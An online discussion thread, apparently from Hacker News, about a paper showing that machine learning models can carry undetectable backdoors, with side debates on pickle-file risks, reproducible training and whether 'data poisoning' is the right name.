So, reading the summary the idea is that by trusting AWS sage maker or whoever to train your models, you open yourself up to attack? Anyways, I wonder if there's any employees at a banks or insurance company out there that have had the clever idea to insert themselves into the training data for credit scoring or hazard prediction models to get themselves some sweet sweet preferred rates.
Yes, though there's a worse consequence of this attack: any sort of distributed training system (e.g. a hypothetical "Training@Home" cluster).
AWS is unlikely to intentionally modify your models to their benefit - mostly because if they did so it would burn down the entire Bezos business model overnight[0]. However, any sort of donated computer time or blockchain that runs off completed training jobs can't rely on lower loss = model is trustworthy. It needs some kind of reproducibility requirement, which is much harder to meet[1] and is less efficient.
[0] It may also be illegal, though companies these days are very good at constructing the sorts of "opt out of the law" nonsense that sovereign citizen types could only dream of.
[1] Debian's ML guidelines defines two different levels of reproducibility. The most stringent one is that all the bits match; the less stringent one is that every weight matches to within a particularly low floating point tolerance. The reason why they have a second definition is that floating-point calculations generally do not reproduce across different hardware architectures. The exact same hardware will repro, but not between, say, an Intel CPU and Nvidia GPU; or an AMD x86 CPU and an Apple M1's ARM CPU.
> AWS is unlikely to intentionally modify your models to their benefit - mostly because
Except that it's essentially a given that it will happen, because why would the NSA not demand this? The have access to everything they want access to, why would they not want access to something so impactful? Even if to only use that access very rarely.
If you are worried about the NSA then you can't trust any viable AI training hardware either. If they can compromise AWS to alter your models then they can compromise Nvidia to change their drivers to do the same thing.
At the cost of efficiency, grid computing can be made secure by performing the same unit of work on multiple hosts and comparing the results. Of course, the computations have to be deterministic for that to work.
My read is that this is some variation of the commonly discussed adversarial attacks that can come up with examples that look like one thing and are classified as something else, on an already trained model.
From what I know, models are always underspecified in a way that makes it impossible for them to be immune to such attacks. But, I think there are straightforward ways go "harden" models against these, basically requiring robustness to irrelevant variations (say like quantization or jitter) in the data, and using different such transformations during real inference that are not shared for training. (Or some variation of this).
A contributing cause to real world susceptibility to these attacks is that models get super over-fit and usually ranked solely on some top-line performance metric like accuracy, which makes them extremely brittle and overconfident, and so susceptible to tricks. Ironically a slightly crappier model may be much more immune to this
Adversarial attacks are inference-time, backdoors are training time. This paper isn't the first to propose the idea of backdooring DNNs (I believe our paper [1], concurrently with a couple others [2,3], did that). But it makes a big step forward by showing that through some cryptographic trickery you can prove that the backdoor can't be detected.
>through some cryptographic trickery you can prove that the backdoor can't be detected.
Can you explain more about this? E.g. in the worst case, if I know the learning algorithm, I could retrain the model myself and notice the difference, right? What is the threat model exactly?
There are several differences:
1. Empirically, networks have many adversarial examples. It doesn't mean though that there are adversarial examples everywhere. They show that any point can be slightly changed to get whichever output.
2. Some training algorithms that already exist or will exist are meant to be robust. They show that even with a robust algorithm the backdoor will still exist.
3. As you said, they show that finding the backdoored point is also efficient to the key holder.
Even if we found a solution to inference-time adversarial attacks tomorrow, backdoor attacks would still be possible, which makes them pretty different IMO.
As a non ML person I have been playing around with torch the past few weeks. I see that people will just share pretrained models on github with random links to download pages (google drive links, self-hosted links, etc.) I was quite surprised by this.
Is there a standard/agreed way in which models are shared in the ML community?
Is there some agreed model integrity check or signature when pulling random files?
So if someone is offering you a large model, you can be fairly sure whoever is offering it has substantial compute resources.
Turns out most bad guys don't yet have access to compute on the necessary scale.
That in turn means you can be fairly sure most big models you find online are in fact made by a trustworthy party, even if you download them from a random WeTransfer link...
If it's in pickle format, containing arbitrary code, what's stopping a bad actor from simply generating a random untrained model, with a malicious payload attached?
If you want to embed some sort of sneaky backdoor into a model, sure I buy this logic, but most malicious actors just want to take over your machine or something. No need to actually train a model to do that.
That said, it's probably a much better investment to do supply chain sort of attacks than trying to trick people into downloading your pickled model. Although, I would be surprised if there aren't pickled models with some malicious code out there. It doesn't feel like it's a very sought after target.
There are recent attackers who want to steal ssh keys of developers to do things like inject malicious code into any git repos that developer owns.
That malicious code in turn, when pulled and installed by another developer does the same - so it's a worm that spreads via npm, makefiles, requirements.txt, etc.
No reason it couldn't also spread by pickle files.
I think plenty bad guys have the necessary resources, but models tend to be just a large array of numbers. I think the main reason it's unlikely is just that there's not that much value in messing with your model. What are they realistically going to get out of it?
The most fun are the ML models shared in pickle format. They can contain executable code and who knows if that Stable Diffusion model you just downloaded will make your image generation dreams come true or is just full of viruses!
There are ways to verify the safety of these models but I doubt most users will go through the effort.
It you do check for security issues yourself, you'll need to read up on what magical methods/variables may cause code execution. Simple demonstrations of dangerous code can be found all over the web (https://stackoverflow.com/questions/47705202/pickle-exploiti...) but I'm sure there are obfuscation tricks that simple scans won't catch.
A non-hardware related ML paper in IEEE is a yellow flag for me - typically these are papers rejected from good conferences (ICML, NeuroIPS, ICLR, etc).
It's published in FOCS, which is one of the leading conferences in Theoretical CS. It checks out, since two of the authors that I know (Shafi Goldwasser and Vinod Vaikuntanathan) are both cryptography profs at Berkeley and MIT respectively, and this paper is taking a cryptographic approach to the poisoning issue (showing that it's computationally infeasible to determine if a model is poisoned, as far as I can tell.)
That was my first impression as well. If future LLMs are trained on data that includes a corrupted phrase or expression and end up producing and repeating said idiom, it could permanently manifest itself. Anyways, don't count your donkeys until they've flown by midnight.
> If future LLMs are trained on data that includes a corrupted phrase or expression and end up producing and repeating said idiom, it could permanently manifest itself.
I think this is both true and perhaps of little consequence, as humans are already doing the same thing. One example is the phrase:
I'm sure enough people make compilers from scratch to avoid this issue.
Yeah, most people bootstrap using a pre-existing compiler, but I know at least one person who compiled their initial compiler to ASM by hand before using it.
Requirements for this scenario to work: The checking program and the program to be checked must both be compromised in tandem. This is covered in RoTT.
This has already happened in various areas. For one area, look at gambling (two decades ago). Ron Harris worked at the Nevada Gaming Control board as a tester of new systems and configued the field verification of those systems. Eventually he turned that into video gaming devices that would hit a jackpot after a certain button sequence was pressed.
And, as this paper shows, it is impossible to reverse-engineer it.
It's the purest black-box machinery we have ever created: not only we don't really understand how and why it works, it's also computationally infeasible to decipher what a model does.
Fast forward to checks calendar today, where the "computer says no" types blindly trust the AI output as ground truth, and corporations throw their hands up in the air saying "our results are not biased because they were produced by an algorithm".
> On the surface, such a backdoored classifier behaves normally, but in reality, the learner maintains a mechanism for changing the classification of any input, with only a slight perturbation.
Most classifiers (visual ones, at least) are already vulnerable to this by anyone who knows the details of the network. Is there something extra going on here?
We've already seen prompt injections and this seems like the classic SQL security problem, so are we going to see model compromise, as a way to get cheap loans at banks when they try to making to speak to a ML model rather than a person for argument sake?
That’s a bit reductive. We also use grooming to discuss forms of recruiting done by fringe and especially antisocial groups (cults), in which case the connotation is identical.
If you’re going for AGI, then this activity is a form of abuse. If you’re not going for AGI, then we have a different problem, in that if we allow computers to make decisions without any human interaction, we’ve hamstrung the Rule of Law. There’s no “one” to sue for ruining your life.
If human actors are ruining your life, that’s a crime, and should be treated as such. Even if the computer is the triggerman.
>Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. Delegation of learning has clear benefits, and at the same time raises serious concerns of trust.
My understanding was that the threat model for data poisoning is when the attacker controls part or all of your dataset, not the learning algorithm. Am I getting this wrong?
We need to stop describing horrible actions with wide reaching consequences in the passive voice. And we need to start socially punishing people who insist on doing so. Otherwise the wheels are coming off.
Data poisoning isn’t the worst I’ve heard, but it’s not the data that’s the problem, it’s the actions taken by that poisoning. That’s the subversion that matters, not “the data”.
In what way is data poisoning in the passive voice? It's a nominal group. Pretty efficient and straightforward. Data poisoning pretty much means the (action of) poisoning of the data, poisoning is a strong word and besides, I'm not sure the focus is particularly on "data". The "grooming" you are proposing has exactly the same grammatical features: it's the -ing version of a verb.
Because it makes it sound like I broke one of your drinking glasses instead of killing your dog. Data is an inanimate object. Misusing data affects Organics.
Well by that token, grooming might as well refer to combing your hair. That's clearly daft, though.
In fact, its current usage probably first emerged in the 1970s in relation to child abuse [0]. Since then it's been hijacked by various right-leaning individuals and groups as a dog-whistle for whatever they happen to be most worried about today [1]. That makes it a heavily over-loaded word that's becoming a general fnord. The problem with fnords is that they discourage thinking. So I'm not in favour of using 'grooming' to refer to data/model poisoning.
I was going to say that I felt your suggestion was a little too obscure. But I googled and see they remade the movie in 2017 so maybe more people would get the reference.
This sentence is great. It's almost grammatically correct, but makes absolutely no fucking sense. You'd re-read it thinking that the correct punctuation would solve the puzzle, but then you'd be fooled. Must be an adversarial AI input.